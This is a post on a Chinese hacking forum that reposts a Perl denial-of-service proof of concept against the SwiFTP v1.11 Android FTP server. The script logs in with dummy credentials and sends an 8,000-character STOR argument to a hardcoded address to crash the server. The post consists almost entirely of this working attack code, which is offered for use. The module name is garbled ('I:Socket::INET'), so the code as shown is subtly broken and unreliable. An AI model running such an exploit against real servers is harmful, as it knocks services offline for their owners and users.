WPE|52wpe|我爱WPE

 找回密码
 注册会员
搜索
  • 2298查看
  • 0回复

[经验分享] SwiFTP v1.11 DOS攻击

主题

好友

484

积分

中级会员

发表于 2010-2-17 05:23:56 |显示全部楼层
# Exploit Title: SwiFTP v1.11 Overflow Dos PoC
# Software Link:http://swiftp.googlecode.com/files/SwiFTP_1.11.apk
# Version: v1.11
# Tested on: Android OS G1 Rogers / Rooted (CyanogenMod-4.0.4)

#!/usr/bin/perl
############
#
# Simple Dos Crap for the Android app : SwiFTP Server v1.11
# by Julien Bedard
#
# This DoS have been patched in the new version that's why
# I'm releasing it.
#
# SwiFTP Server v1.11 --> Vulnerable
# SwiFTP Server v1.13 --> Patched
#
####################################

use I:Socket::INET;

$overflow = 'A' x 8000;

$ftpraw=I:Socket::INET->new("192.168.2.13:2121") or die;

print $ftpraw "user nouser\n";
print $ftpraw "pass nopass\n";
print $ftpraw "stor $overflow\n";
print $ftpraw "QUIT\n";

close $ftpraw;

快速发帖

您需要登录后才可以回帖 登录 | 注册会员

手机版|Archiver|WPE|52wpe|我爱WPE ( 闽ICP备15009081号 )

GMT+8, 2024-4-28 11:20 , Processed in 0.061064 second(s), 16 queries .

返回顶部